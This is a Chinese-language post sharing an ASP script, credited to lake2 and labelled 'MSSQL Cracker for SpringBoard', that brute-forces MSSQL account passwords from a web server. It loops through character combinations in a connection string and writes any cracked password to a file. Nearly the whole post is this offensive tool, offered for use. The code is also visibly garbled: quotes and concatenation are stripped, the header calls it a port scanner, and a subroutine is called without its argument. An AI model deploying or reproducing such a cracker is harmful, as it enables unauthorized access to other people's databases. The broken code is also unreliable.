一个暴力破解MSSQL用户密码的ASP程序

　　作者: Knight

　　一个暴力破解MSSQL用户密码的ASP程序,以下这个版本是可以运行之后关闭浏览器，运行完毕将在当前目录生成结果文件的。

　　
CODE:
[Copy to clipboard]
<%
============ ASP Port Scanner by lake2 ===================

Version: 0.1
For SpringBoard
==========================================================
%>
<style type=text/css>
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.styleRed {color: #FF0000}
</style>
<title>MSSQL Cracker for SpringBoard</title>
<%
Dim Password()
If Request.Form(go) <> 1 Then
%>
<p align=center>Welcome to <a href=
<form name=form1 method=post action= onSubmit=form1.Submit.disabled=true;>
ConnStr:
<input name=conn type=text class=TextBox id=conn value=Provider=SQLOLEDB.1;Data Source=127.0.0.1;User ID=sa;Password={PASS}; size=70>
<br>
Char:
<input name=char type=text class=TextBox id=char value=0123456789 size=30>
<br>
Length:
<input name=len type=text class=TextBox id=len value=3 size=4>
<br>
Path:
<input name=path type=text class=TextBox value=<%=Server.MapPath(r.txt)%> size=50>
<input name=CFile type=checkbox class=TextBox id=CFile value=1 checked>
Enablel<br>
<input name=go type=hidden id=go value=1>
<br>
<input name=Submit type=submit class=buttom id=Submit value= Run >
</form>
<%
Else
timer1 = timer
Server.ScriptTimeout = 7776000
ConnStr = Request.Form(Conn)
Char = request.Form(char)
LenChar = Len(Char)
ReDim password(LenChar)
For i = 1 to LenChar
password(i) = Mid(Char, i, 1)
Next
length = CInt(request.Form(len))
Call LAKE()
response.Write Done!<br>Process tTime s
If request.Form(CFile) <> Then CreateResult(Done! vbcrlf tTime)
End If

　　Sub LAKE(str)
If Len(str) >= length Then Exit Sub
For j = 1 to LenChar
pass = str password(j)
If Len(pass) = length Then Call Crack(pass)
Call LAKE(pass)
Next
End Sub

　　
Sub Crack(str)
On Error Resume Next
conn.open Replace(ConnStr,{PASS},str)
If Err Then
If Err.Number <> -2147217843 Then
response.Write(Err.Description <BR>)
response.End()
End If
Else
response.Write(I Get it ! Password is <font color=red> str </font><BR>Process tTime s)
If request.Form(CFile) <> Then CreateResult(str vbcrlf tTime)
response.End()
End If
End Sub

　　
Function tTime()
timer2 = timer
thetime=cstr(int(timer2-timer1))
tTime = thetime
End Function

　　
Sub CreateResult(t)
Set fs = CreateObject(Scripting.FileSystemObject)
Set outfile = fs.CreateTextFile(request.Form(path))
outfile.WriteLine t
Set fs = Nothing
End Sub
%>